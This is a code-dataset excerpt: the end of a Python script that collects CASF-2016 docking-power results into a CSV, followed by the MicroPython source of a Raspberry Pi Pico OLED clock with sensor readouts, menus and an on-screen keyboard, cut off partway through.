conf_04_list.append(conf_04)\n if i == tmp + 13:\n tmp_line = str(line).split(sep=\" \")\n spearman_05 = tmp_line[-1]\n spearman_05 = spearman_05[0:-1]\n spearman_05_list.append(spearman_05)\n if i == tmp + 14:\n tmp_line = str(line).split()\n conf_05 = tmp_line[-3:]\n conf_05 = str(conf_05[0]) + str(conf_05[1]) + str(conf_05[2])\n conf_05_list.append(conf_05)\n if i == tmp + 15:\n tmp_line = str(line).split(sep=\" \")\n spearman_06 = tmp_line[-1]\n spearman_06 = spearman_06[0:-1]\n spearman_06_list.append(spearman_06)\n if i == tmp + 16:\n tmp_line = str(line).split()\n conf_06 = tmp_line[-3:]\n conf_06 = str(conf_06[0]) + str(conf_06[1]) + str(conf_06[2])\n conf_06_list.append(conf_06)\n if i == tmp + 17:\n tmp_line = str(line).split(sep=\" \")\n spearman_07 = tmp_line[-1]\n spearman_07 = spearman_07[0:-1]\n spearman_07_list.append(spearman_07)\n if i == tmp + 18:\n tmp_line = str(line).split()\n conf_07 = tmp_line[-3:]\n conf_07 = str(conf_07[0]) + str(conf_07[1]) + str(conf_07[2])\n conf_07_list.append(conf_07)\n if i == tmp + 19:\n tmp_line = str(line).split(sep=\" \")\n spearman_08 = tmp_line[-1]\n spearman_08 = spearman_08[0:-1]\n spearman_08_list.append(spearman_08)\n if i == tmp + 20:\n tmp_line = str(line).split()\n conf_08 = tmp_line[-3:]\n conf_08 = str(conf_08[0]) + str(conf_08[1]) + str(conf_08[2])\n conf_08_list.append(conf_08)\n if i == tmp + 21:\n tmp_line = str(line).split(sep=\" \")\n spearman_09 = tmp_line[-1]\n spearman_09 = spearman_09[0:-1]\n spearman_09_list.append(spearman_09)\n if i == tmp + 22:\n tmp_line = str(line).split()\n conf_09 = tmp_line[-3:]\n conf_09 = str(conf_09[0]) + str(conf_09[1]) + str(conf_09[2])\n conf_09_list.append(conf_09)\n if i == tmp + 23:\n tmp_line = str(line).split(sep=\" \")\n spearman_010 = tmp_line[-1]\n spearman_010 = spearman_010[0:-1]\n spearman_010_list.append(spearman_010)\n if i == tmp + 24:\n tmp_line = str(line).split()\n conf_010 = tmp_line[-3:]\n conf_010 = str(conf_010[0]) + str(conf_010[1]) + str(conf_010[2])\n conf_010_list.append(conf_010)\n \n print(data,model,add_info,score,\"Done\")\n\n\n data = {\n \"Datatype\": data_list,\n \"Modeltype\": 
model_list,\n \"Featuretype\": add_info_list,\n \"Scoretype\": score_list,\n \"Top1: # correct binding poses:\": top1_number_list,\n \"Top1: '%' correct binding poses:\": top1_percent_list,\n \"Top2: # correct binding poses:\": top2_number_list,\n \"Top2: '%' correct binding poses:\": top2_percent_list,\n \"Top3: # correct binding poses:\": top3_number_list,\n \"Top3: '%' correct binding poses:\": top3_percent_list,\n \"Spearman correlation coefficient in rmsd range [0-2]:\": spearman_02_list,\n \"90'%' confidence interval in rmsd range [0-2]:\": conf_02_list,\n \"Spearman correlation coefficient in rmsd range [0-3]:\": spearman_03_list,\n \"90'%' confidence interval in rmsd range [0-3]:\": conf_03_list,\n \"Spearman correlation coefficient in rmsd range [0-4]:\": spearman_04_list,\n \"90'%' confidence interval in rmsd range [0-4]:\": conf_04_list,\n \"Spearman correlation coefficient in rmsd range [0-5]:\": spearman_05_list,\n \"90'%' confidence interval in rmsd range [0-5]:\": conf_05_list,\n \"Spearman correlation coefficient in rmsd range [0-6]:\": spearman_06_list,\n \"90'%' confidence interval in rmsd range [0-6]:\": conf_06_list,\n \"Spearman correlation coefficient in rmsd range [0-7]:\": spearman_07_list,\n \"90'%' confidence interval in rmsd range [0-7]:\": conf_07_list,\n \"Spearman correlation coefficient in rmsd range [0-8]:\": spearman_08_list,\n \"90'%' confidence interval in rmsd range [0-8]:\": conf_08_list,\n \"Spearman correlation coefficient in rmsd range [0-9]:\": spearman_09_list,\n \"90'%' confidence interval in rmsd range [0-9]:\": conf_09_list,\n \"Spearman correlation coefficient in rmsd range [0-10]:\": spearman_010_list,\n \"90'%' confidence interval in rmsd range [0-10]:\": conf_010_list,\n }\n df = pd.DataFrame(data)\n df.to_csv(f\"results_power_docking_{sign}.csv\")\n","repo_name":"molinfo-vienna/phantomdragon","sub_path":"data/CASF-2016/power_docking/combine_power_docking.py","file_name":"combine_power_docking.py","file_ext":"py","file_size_in_byte":10961,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"8084316934","text":"import machine\nfrom machine import Timer, Pin, RTC\nfrom utime import sleep, sleep_ms\nfrom ssd1306 import SSD1306_I2C\nimport ds3231\nimport sht30\nimport random\nimport framebuf\nfrom math import *\n\n'''\n尽量优化程序\n同时展现树莓派pico的全部实力\n\n注释:\n1-字符都是8x8大小,自定义小字符大小为3x5\n2-屏幕左上角为(0,0),0号屏幕为主屏[128x64],1号屏幕为副屏[128x32]\n3-eval与pc版python出入较大,尽量避免使用\n4-当前涉及的技术:1)树莓派pico 2)OLED显示屏SSD1306 3)温度湿度传感器SHT-31 4)时钟元件DS3231\n'''\n\n\nclass PicoClock:\n def __init__(self):\n self.init_i2c() # 初始化i2c\n self.init_button() # 初始化物理按钮\n self.setting_control(mode='read') # 从文件读取设置\n self.init_pin() # 初始化PIN\n self.init_var() # 初始化全局变量\n self.init_icon() # 定义符号\n self.init_rtc() # 初始化rtc\n\n self.fun_MainMenu() # 进入主界面\n\n # 基础函数部分\n def init_i2c(self):\n # 定义0和1号i2c引脚\n sda_0 = machine.Pin(8)\n scl_0 = machine.Pin(9)\n # sda_1 = machine.Pin(14)\n # scl_1 = machine.Pin(15)\n\n # 定义0和1号i2c\n i2c_0 = machine.I2C(0, sda=sda_0, scl=scl_0, freq=400000)\n # i2c_1 = machine.I2C(1, sda=sda_1, scl=scl_1, freq=400000)\n\n # 测试用,打印0和1号i2c检测到的设备地址\n print('i2c_0 addr:' + str(i2c_0.scan()))\n # print('i2c_1 addr:' + str(i2c_1.scan()))\n\n # 定义oled显示屏\n self.oled_0 = SSD1306_I2C(128, 64, i2c_0, addr=0x3d)\n self.oled_1 = SSD1306_I2C(128, 32, i2c_0, addr=0x3c)\n\n def init_button(self):\n self.button_u = machine.Pin(12, machine.Pin.IN, machine.Pin.PULL_UP)\n self.button_d = machine.Pin(11, machine.Pin.IN, 
machine.Pin.PULL_UP)\n self.button_l = machine.Pin(26, machine.Pin.IN, machine.Pin.PULL_UP)\n self.button_r = machine.Pin(15, machine.Pin.IN, machine.Pin.PULL_UP)\n self.button_y = machine.Pin(10, machine.Pin.IN, machine.Pin.PULL_UP)\n self.button_n = machine.Pin(14, machine.Pin.IN, machine.Pin.PULL_UP)\n\n def init_switch(self):\n self.switch_fps = True\n self.switch_ShowSleepTime = True\n self.switch_ShowBootLogo = True\n\n def init_pin(self):\n # self.inner_rgb = machine.Pin(29, machine.Pin.OUT)\n pass\n\n def init_var(self):\n self.is_init_fps = 0 # fps计数器是否初始化\n self.button_gap = 0 # 按钮防抖\n self.is_button_ready = 0 # 按钮是否准备就绪\n self.refresh_scale = 3 # 副屏幕刷新速度控制,是几就代表是主屏幕的几分之一\n self.sleep_time_learning = 0 # 可变的睡眠时间\n self.fps_limit = 9 # 帧率限制\n self.time_out_count = 0 # 超时计时器当前计时\n self.time_out_limit = 15 # 超时计时器上限\n\n def init_icon(self):\n self.icon_dic = {'icon_little_a': ['010', '101', '111', '101', '101'],\n 'icon_little_b': ['110', '101', '110', '101', '110'],\n 'icon_little_c': ['011', '100', '100', '100', '011'],\n 'icon_little_d': ['110', '101', '101', '101', '110'],\n 'icon_little_e': ['111', '100', '111', '100', '111'],\n 'icon_little_f': ['111', '100', '111', '100', '100'],\n 'icon_little_g': ['111', '100', '101', '101', '111'],\n 'icon_little_h': ['101', '101', '111', '101', '101'],\n 'icon_little_i': ['111', '010', '010', '010', '111'],\n 'icon_little_j': ['011', '001', '001', '101', '111'],\n 'icon_little_k': ['101', '110', '100', '110', '101'],\n 'icon_little_l': ['100', '100', '100', '100', '111'],\n 'icon_little_m': ['101', '111', '101', '101', '101'],\n 'icon_little_n': ['000', '100', '111', '101', '101'],\n 'icon_little_o': ['111', '101', '101', '101', '111'],\n 'icon_little_p': ['110', '101', '110', '100', '100'],\n 'icon_little_q': ['011', '101', '011', '001', '001'],\n 'icon_little_r': ['110', '101', '110', '101', '101'],\n 'icon_little_s': ['011', '100', '011', '001', '110'],\n 'icon_little_t': ['111', '010', '010', '010', '010'],\n 'icon_little_u': ['101', '101', '101', '101', '111'],\n 'icon_little_v': ['101', '101', '101', '101', '010'],\n 'icon_little_w': ['101', '101', '101', '111', '101'],\n 'icon_little_x': ['101', '101', '010', '101', '101'],\n 'icon_little_y': ['101', '101', '011', '001', '011'],\n 'icon_little_z': ['111', '001', '010', '100', '111'],\n\n 'icon_little_0': ['010', '101', '101', '101', '010'],\n 'icon_little_1': ['110', '010', '010', '010', '111'],\n 'icon_little_2': ['111', '001', '111', '100', '111'],\n 'icon_little_3': ['110', '001', '011', '001', '110'],\n 'icon_little_4': ['101', '101', '111', '001', '001'],\n 'icon_little_5': ['111', '100', '110', '001', '110'],\n 'icon_little_6': ['010', '100', '111', '101', '011'],\n 'icon_little_7': ['111', '101', '001', '010', '010'],\n 'icon_little_8': ['010', '101', '010', '101', '010'],\n 'icon_little_9': ['010', '101', '011', '001', '010'],\n\n 'icon_little_ ': ['000', '000', '000', '000', '000'],\n 'icon_focus_now': ['010', '101'],\n\n 'icon_little_!': ['010', '010', '010', '000', '010'],\n 'icon_little_\"': ['101', '101'],\n 'icon_little_%': ['101', '001', '010', '100', '101'],\n 'icon_little_&': ['010', '100', '010', '101', '011'],\n 'icon_little_\\'': ['010', '010'],\n 'icon_little_(': ['001', '010', '010', '010', '001'],\n 'icon_little_)': ['100', '010', '010', '010', '100'],\n 'icon_little_*': ['000', '010', '111', '101', '000'],\n 'icon_little_+': ['000', '010', '111', '010', '000'],\n 'icon_little_,': ['000', '000', '000', '010', '100'],\n 'icon_little_-': ['000', '000', '111', 
'000', '000'],\n 'icon_little_.': ['000', '000', '000', '000', '010'],\n 'icon_little_/': ['001', '001', '010', '100', '100'],\n 'icon_little_:': ['000', '010', '000', '010', '000'],\n 'icon_little_;': ['000', '010', '000', '010', '100'],\n 'icon_little_<': ['000', '011', '100', '011', '000'],\n 'icon_little_=': ['000', '111', '000', '111', '000'],\n 'icon_little_>': ['000', '110', '001', '110', '000'],\n 'icon_little_?': ['111', '101', '011', '000', '010'],\n 'icon_little_[': ['011', '010', '010', '010', '011'],\n 'icon_little_\\\\': ['100', '100', '010', '001', '001'],\n 'icon_little_]': ['110', '010', '010', '010', '110'],\n 'icon_little_^': ['010', '101'],\n 'icon_little__': ['000', '000', '000', '000', '000'],\n 'icon_little_`': ['10', '01'],\n 'icon_little_{': ['001', '010', '110', '010', '001'],\n 'icon_little_|': ['01', '01', '01', '01', '01'],\n 'icon_little_}': ['100', '010', '011', '010', '100'],\n\n 'icon_°': ['111', '101', '111']}\n self.icon_dic_keys = list(self.icon_dic.keys())\n self.icon_dic_keys.sort()\n\n def init_rtc(self, mode='init'):\n if mode == 'init':\n self.rtc = RTC()\n\n t = ds3231.ReportList() # 获取时间\n\n sec = t[0]\n min = t[1]\n hou = t[2]\n day = t[4]\n mon = t[5]\n yea = t[6]\n\n tuple = (2000+yea, mon, day, 0, hou, min, sec, 0)\n\n self.rtc.datetime(tuple)\n\n\n # 自定义绘制方法\n def draw_border(self, id=0):\n if id == 0:\n self.oled_0.rect(0, 0, 128, 64, 1)\n elif id == 1:\n self.oled_1.rect(0, 0, 128, 32, 1)\n\n def draw_vline(self, x, id=0, leng=0):\n if id == 0:\n if leng == 0:\n leng = 64\n self.oled_0.vline(x, int((64 - leng) / 2), leng, 1)\n elif id == 1:\n if leng == 0:\n leng = 32\n self.oled_1.vline(x, int((32 - leng) / 2), leng, 1)\n\n def draw_hline(self, y, id=0, leng=0):\n if id == 0:\n if leng == 0:\n leng = 128\n self.oled_0.hline(int((128 - leng) / 2), y, leng, 1)\n elif id == 1:\n if leng == 0:\n leng = 128\n self.oled_1.hline(int((128 - leng) / 2), y, leng, 1)\n\n def clear(self, id=0):\n if id == 0:\n self.oled_0.fill(0)\n elif id == 1:\n self.oled_1.fill(0)\n else:\n self.oled_0.fill(0)\n self.oled_1.fill(0)\n\n def show(self, id=0):\n if id == 0:\n self.oled_0.show()\n elif id == 1:\n self.oled_1.show()\n else:\n self.oled_0.show()\n self.oled_1.show()\n\n def draw_icon(self, lis, x0, y0, id=0):\n for y in range(len(lis)):\n for x in range(len(lis[y])):\n if lis[y][x] == '1' and id == 0:\n self.oled_0.pixel(x0 + x, y0 + y, 1)\n elif lis[y][x] == '1' and id == 1:\n self.oled_1.pixel(x0 + x, y0 + y, 1)\n\n # 自定义文本方法\n def text_l(self, text, y, border=3, id=0):\n text = str(text)\n if id == 0:\n self.oled_0.text(text, 0 + border, y)\n elif id == 1:\n self.oled_1.text(text, 0 + border, y)\n else:\n return 1\n\n def text_lc(self, text, y, border=3, id=0):\n text = str(text)\n leng = len(text) * 8\n if id == 0:\n self.oled_0.fill_rect(0 + border, y, leng, 8, 0)\n elif id == 1:\n self.oled_1.fill_rect(0 + border, y, leng, 8, 0)\n else:\n return 1\n\n def text_r(self, text, y, border=3, id=0):\n text = str(text)\n leng = len(text) * 8\n if id == 0:\n self.oled_0.text(text, 128 - border - leng, y)\n elif id == 1:\n self.oled_1.text(text, 128 - border - leng, y)\n else:\n return 1\n\n def text_rc(self, text, y, id=0):\n text = str(text)\n leng = len(text) * 8\n if id == 0:\n self.oled_0.fill_rect(128 - leng, y, leng, 8, 0)\n elif id == 1:\n self.oled_1.fill_rect(128 - leng, y, leng, 8, 0)\n else:\n return 1\n\n def text_m(self, text, y, id=0):\n text = str(text)\n leng = len(str(text)) * 8\n if id == 0:\n self.oled_0.text(text, int((128 - leng) / 2), 
y)\n elif id == 1:\n self.oled_1.text(text, int((128 - leng) / 2), y)\n else:\n return 1\n\n def text_mc(self, text, y, id=0):\n text = str(text)\n leng = len(str(text)) * 8\n if id == 0:\n self.oled_0.fill_rect(int((128 - leng) / 2), y, leng, 8, 0)\n elif id == 1:\n self.oled_1.fill_rect(int((128 - leng) / 2), y, leng, 8, 0)\n else:\n return 1\n\n def text_clear(self, x, y, length, height=8, id=0):\n if id == 0:\n self.oled_0.fill_rect(x, y, length, height, 0)\n if id == 1:\n self.oled_1.fill_rect(x, y, length, height, 0)\n\n def simple_bar(self, y, leng, index, id=0):\n text = '{' + index * '-' + '=' + (leng - index - 1) * '-' + '}'\n self.text_m(text, y, id=id)\n\n def text_little(self, text, x, y, id=0):\n text = str(text).lower()\n for i in range(len(text)):\n self.draw_icon(lis=self.icon_dic.get(\"icon_little_\" + text[i]), x0=x + 4 * i, y0=y + 2, id=id)\n\n # 关键函数部分\n def button_sign(self):\n if self.button_u.value() == 0:\n self.sleep_button()\n if self.button_u.value() == 0:\n # self.inner_rgb.value(1)\n return 'u'\n elif self.button_d.value() == 0:\n self.sleep_button()\n if self.button_d.value() == 0:\n # self.inner_rgb.value(1)\n return 'd'\n elif self.button_l.value() == 0:\n self.sleep_button()\n if self.button_l.value() == 0:\n # self.inner_rgb.value(1)\n return 'l'\n elif self.button_r.value() == 0:\n self.sleep_button()\n if self.button_r.value() == 0:\n # self.inner_rgb.value(1)\n return 'r'\n elif self.button_y.value() == 0:\n self.sleep_button()\n if self.button_y.value() == 0:\n # self.inner_rgb.value(1)\n return 'y'\n elif self.button_n.value() == 0:\n self.sleep_button()\n if self.button_n.value() == 0:\n # self.inner_rgb.value(1)\n return 'n'\n else:\n # self.inner_rgb.value(0)\n return 0\n\n def show_fps(self, s, id=0, switch=1):\n if self.is_init_fps == 0:\n self.sec_buffer = '0' # 用于记录当前秒数\n self.frame_counter = 0 # 记帧器\n self.fps = 0 # 一秒帧数\n self.is_init_fps = 1\n\n if self.sec_buffer != s:\n self.sec_buffer = s\n self.fps = self.frame_counter\n self.frame_counter = 0\n else:\n self.frame_counter += 1\n\n if self.switch_fps and switch:\n leng = len(str(self.fps)) * 8 + 32 # 32=4*8\n if id == 0:\n self.text_clear(0, 0, length=leng)\n self.text_l(\"fps=\" + str(self.fps), 0, border=0, id=0)\n\n if self.switch_ShowSleepTime and switch:\n leng = len(str(self.sleep_time_learning)) * 8 + 32\n self.text_clear(128 - leng, 0, leng)\n self.text_r(\"stl=\" + str(self.sleep_time_learning), 0, border=0)\n\n def sleep_button(self):\n sleep_ms(self.button_gap)\n\n def fps_limiter(self, limit, frame_count=0, fps=0):\n if frame_count > limit + 1 and self.sleep_time_learning <= 60:\n self.sleep_time_learning += 1\n elif fps < limit - 1 and self.sleep_time_learning > 0:\n if random.randint(0, 1): # 减缓延时下降速度\n self.sleep_time_learning -= 1\n sleep_ms(self.sleep_time_learning)\n\n def setting_control(self, mode):\n file_name = 'setting.ini'\n # 读\n if mode == 'read':\n try:\n with open(file_name, 'r') as f:\n self.setting_dic = eval(f.read())\n # 从字典读取设置\n self.switch_fps = self.setting_dic.get('Show FPS')\n self.switch_ShowSleepTime = self.setting_dic.get('Show STL')\n self.switch_ShowBootLogo = self.setting_dic.get('Boot Logo')\n print(file_name + \" Loaded\")\n print(\"setting_dic=\" + str(self.setting_dic))\n except Exception:\n print(\"Load Failed\")\n self.init_switch() # 初始化设置\n self.setting_control(mode='initwrite')\n # 初始化写\n elif mode == 'initwrite':\n try:\n # 初始化设置字典\n self.setting_dic = {'Show FPS': self.switch_fps,\n 'Show STL': self.switch_ShowSleepTime,\n 'Boot 
Logo': self.switch_ShowBootLogo}\n # 写入文件\n with open(file_name, 'w') as f:\n f.write(str(self.setting_dic))\n print(file_name + \" Initialized\")\n except OSError:\n # 如果出错\n self.error_window('OSError')\n # 覆写设置\n elif mode == 'overwrite':\n try:\n # 写入文件\n with open(file_name, 'w') as f:\n f.write(str(self.setting_dic))\n print(file_name + \" Updated\")\n except OSError:\n # 如果出错\n self.error_window('OSError')\n # 更新(先写再读)\n elif mode == 'update':\n self.setting_control(mode='overwrite')\n self.setting_control(mode='read')\n print(\"Setting Updated And Loaded\")\n\n # 重要功能部分 # 主界面\n def fun_MainMenu(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n is_oled_1_need_refresh = 1\n week_lis = [\"Mon\", \"Tues\", \"Wed\", \"Thur\", \"Fri\", \"Sat\", \"Sun\"] # 星期名\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n\n if self.switch_ShowBootLogo:\n self.fun_BootLogo()\n\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n is_oled_1_need_refresh = 1\n if ButtonSign == 'y':\n self.fun_SubMenu()\n elif ButtonSign == 'n':\n self.fun_PowerSave()\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n try:\n # 绘制时间\n self.text_m(\"%02d:%02d:%02d\" % (self.current_time[4], self.current_time[5], self.current_time[6]), 18)\n # 绘制日期\n self.text_m(\"%d/%02d/%02d\" % (self.current_time[0], self.current_time[1], self.current_time[2]), 28)\n # 绘制星期\n self.text_m(\"%s\" % (week_lis[self.current_time[3]]), 38)\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n except:\n pass\n\n self.show() # 绘制所有\n\n ###副屏幕内容###\n if self.frame_counter == 0 and is_oled_1_need_refresh == 1:\n self.clear(id=1) # 清除所有\n self.text_m(\"Hello World\", 12, id=1)\n self.show(id=1) # 绘制所有\n is_oled_1_need_refresh = 0\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 等待\n\n # 细分菜单\n def fun_SubMenu(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6]\n\n # 功能代号\n SHT31 = 'Temp & RH'\n BaseConverter = 'Base Converter'\n REPL = 'EZ REPL'\n IconTest = 'Icon Test'\n fx = 'fx'\n Setting = 'Setting'\n UnitConverter = 'Unit Converter'\n\n index_lis = [SHT31, BaseConverter, UnitConverter, REPL, Setting]\n index_lis_len = len(index_lis)\n index_now = 0\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n # 确认按钮\n if ButtonSign == 'y':\n if index_lis[index_now] == 'Main Menu':\n return 0\n elif index_lis[index_now] == SHT31:\n self.fun_SHT31()\n elif index_lis[index_now] == BaseConverter:\n self.fun_BaseConverter()\n elif index_lis[index_now] == REPL:\n self.fun_REPL()\n elif index_lis[index_now] == Setting:\n self.fun_Setting()\n elif index_lis[index_now] == UnitConverter:\n self.fun_UnitConverter()\n\n # test\n elif index_lis[index_now] == fx:\n self.fx_window()\n elif index_lis[index_now] == IconTest:\n self.fun_IconTest()\n\n # 左按钮\n if ButtonSign == 'l':\n if index_now == 0:\n index_now = index_lis_len - 1\n else:\n index_now -= 1\n # 右按钮\n if ButtonSign == 'r':\n if index_now == index_lis_len - 1:\n index_now = 0\n else:\n index_now += 1\n # 返回按钮\n if ButtonSign == 'n':\n return 
0\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n self.draw_border() # 绘制边界\n\n self.text_m(index_lis[index_now], 28) # 显示当前选中的功能名\n self.simple_bar(38, index_lis_len, index_now, id=0) # 显示一个条,告诉用户当前位置\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n self.clear(id=1) # 清除所有\n\n self.text_m(\"%02d:%02d:%02d\" % (self.current_time[4], self.current_time[5], self.current_time[6]), 0, id=1)\n\n self.show(id=1) # 绘制所有\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 等待\n\n # 错误弹窗,会在屏幕上打印参数code\n def error_window(self, code='null'):\n self.is_button_ready = 0\n\n width = 100\n height = 50\n self.oled_0.fill_rect(64 - int(width / 2), 32 - int(height / 2), width, height, 0)\n self.oled_0.rect(64 - int(width / 2), 32 - int(height / 2), width, height, 1)\n self.text_m(\"!ERROR!\", 18)\n self.text_m(code, 28)\n self.text_m(\"[PRESS]\", 38)\n self.show()\n while True:\n ButtonSign = self.button_sign()\n if ButtonSign != 0 and self.is_button_ready:\n self.is_button_ready = 0\n return 0\n elif ButtonSign == 0 and not self.is_button_ready:\n self.is_button_ready = 1\n else:\n sleep_ms(50)\n\n # 普通弹窗\n def jump_window(self, title='!Notice!', code='null'):\n self.is_button_ready = 0\n\n width = 100\n height = 50\n self.oled_0.fill_rect(64 - int(width / 2), 32 - int(height / 2), width, height, 0)\n self.oled_0.rect(64 - int(width / 2), 32 - int(height / 2), width, height, 1)\n self.text_m(title, 18)\n self.text_m(code, 28)\n self.text_m(\"[PRESS]\", 38)\n self.show()\n while True:\n ButtonSign = self.button_sign()\n if ButtonSign != 0 and self.is_button_ready:\n self.is_button_ready = 0\n return 0\n elif ButtonSign == 0 and not self.is_button_ready:\n self.is_button_ready = 1\n else:\n sleep_ms(50)\n\n # 输入界面,会返回用户输入的东西\n def input_keyboard(self, msg_already=''):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n\n line_lis_button = ['OK', 'RE', '<-', '_', '->', 'BS']\n line_lis_0 = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', 'CAP']\n line_lis_1 = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', '-', 'CAP']\n line_lis_2 = ['K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', '*', 'CAP']\n line_lis_3 = ['U', 'V', 'W', 'X', 'Y', 'Z', ':', '$', '%', '&', '/', 'FX']\n line_lis_4 = ['(', '[', '{', '<', '>', '!', '=', ',', '.', '\\'', '\\\"', 'FX']\n line_lis_all = [line_lis_button, line_lis_0, line_lis_1, line_lis_2, line_lis_3, line_lis_4]\n\n # 初始化大小写\n try:\n if self.input_cap_mode == 'a':\n pass\n except Exception:\n self.input_cap_mode = 'a'\n # 初始同步列表里字母大小写\n for lis in line_lis_all:\n for x in range(len(lis)):\n if len(lis[x]) == 1 and self.input_cap_mode == 'A':\n lis[x] = lis[x].upper()\n elif len(lis[x]) == 1 and self.input_cap_mode == 'a':\n lis[x] = lis[x].lower()\n\n msg_input = msg_already # 用户输入的信息\n focus_input = 0 # 输入指针位置\n focus_select_x = 0 # 指针x轴\n focus_select_y = 1 # 指针y轴\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n # 确认键\n if ButtonSign == 'y':\n focus_now = line_lis_all[focus_select_y][focus_select_x]\n # 确认\n if focus_now == 'OK':\n return str(msg_input)\n # 重置\n elif focus_now == 'RE':\n msg_input = ''\n focus_input = 0\n # 空格\n elif 
focus_now == '_':\n msg_input += ' '\n focus_input += 1\n # 左移\n elif focus_now == '<-' and focus_input != 0:\n focus_input -= 1\n # 右移\n elif focus_now == '->' and focus_input != len(str(msg_input)):\n focus_input += 1\n # 退格\n elif focus_now == 'BS' and msg_input != '':\n msg_input = list(msg_input)\n if focus_input != 0:\n del msg_input[focus_input - 1]\n msg_input = ''.join(msg_input)\n if focus_input != 0:\n focus_input -= 1\n # CAP\n elif focus_now == 'CAP':\n for lis in line_lis_all:\n for x in range(len(lis)):\n if len(lis[x]) == 1 and self.input_cap_mode == 'A':\n lis[x] = lis[x].lower()\n elif len(lis[x]) == 1 and self.input_cap_mode == 'a':\n lis[x] = lis[x].upper()\n if self.input_cap_mode == 'A':\n self.input_cap_mode = 'a'\n elif self.input_cap_mode == 'a':\n self.input_cap_mode = 'A'\n\n # FX\n elif focus_now == 'FX':\n fx = self.fx_window()\n if fx != 'null':\n msg_input = list(msg_input)\n msg_input.insert(focus_input, fx)\n msg_input = ''.join(msg_input)\n focus_input += len(fx) - 1\n\n # 一般输入\n else:\n msg_input = list(msg_input)\n msg_input.insert(focus_input, focus_now)\n msg_input = ''.join(msg_input)\n focus_input += 1\n\n # 括号\n if focus_now == '(':\n msg_input = list(msg_input)\n msg_input.insert(focus_input, ')')\n msg_input = ''.join(msg_input)\n elif focus_now == '[':\n msg_input = list(msg_input)\n msg_input.insert(focus_input, ']')\n msg_input = ''.join(msg_input)\n elif focus_now == '{':\n msg_input = list(msg_input)\n msg_input.insert(focus_input, '}')\n msg_input = ''.join(msg_input)\n\n # 返回键\n elif ButtonSign == 'n':\n return 'null'\n # 左键\n elif ButtonSign == 'l':\n if focus_select_x == 0:\n focus_select_x = len(line_lis_all[focus_select_y]) - 1\n else:\n focus_select_x -= 1\n # 右键\n elif ButtonSign == 'r':\n if focus_select_x == len(line_lis_all[focus_select_y]) - 1:\n focus_select_x = 0\n else:\n focus_select_x += 1\n # 上键\n elif ButtonSign == 'u':\n if line_lis_all[focus_select_y][focus_select_x] == 'FX':\n focus_select_y = 1\n else:\n if focus_select_y == 0:\n focus_select_y = len(line_lis_all) - 1\n else:\n focus_select_y -= 1\n if focus_select_x > len(line_lis_all[focus_select_y]) - 1:\n focus_select_x = len(line_lis_all[focus_select_y]) - 1\n # 下键\n elif ButtonSign == 'd':\n if line_lis_all[focus_select_y][focus_select_x] == 'CAP':\n focus_select_y = 5\n else:\n if focus_select_y == len(line_lis_all) - 1:\n focus_select_y = 0\n else:\n focus_select_y += 1\n if focus_select_x > len(line_lis_all[focus_select_y]) - 1:\n focus_select_x = len(line_lis_all[focus_select_y]) - 1\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n\n # 打印可输入字符\n for y in range(len(line_lis_all) - 1):\n for x in range(len(line_lis_all[y + 1]) - 1):\n self.oled_0.text(line_lis_all[y + 1][x], 4 + x * 10, 8 + y * 11)\n # 打印CAP\n if self.input_cap_mode == 'A':\n self.oled_0.text(\"C\", 118, 11)\n self.oled_0.text(\"A\", 118, 19)\n self.oled_0.text(\"P\", 118, 27)\n elif self.input_cap_mode == 'a':\n self.oled_0.text(\"c\", 118, 11)\n self.oled_0.text(\"a\", 118, 19)\n self.oled_0.text(\"p\", 118, 27)\n # 打印FX\n self.text_little('fx', 119, 47)\n\n # 绘制主屏指针框\n if focus_select_y != 0 and focus_select_x != len(line_lis_all[focus_select_y]) - 1:\n self.oled_0.rect(4 + focus_select_x * 10 - 1, 8 + (focus_select_y - 1) * 11 - 2, 10, 11, 1)\n elif line_lis_all[focus_select_y][focus_select_x] == 'CAP':\n self.oled_0.rect(117, 9, 10, 27, 1)\n elif line_lis_all[focus_select_y][focus_select_x] == 'FX':\n 
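# highlight the FX key: rect(x, y, width, height) in the panel's bottom-right corner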
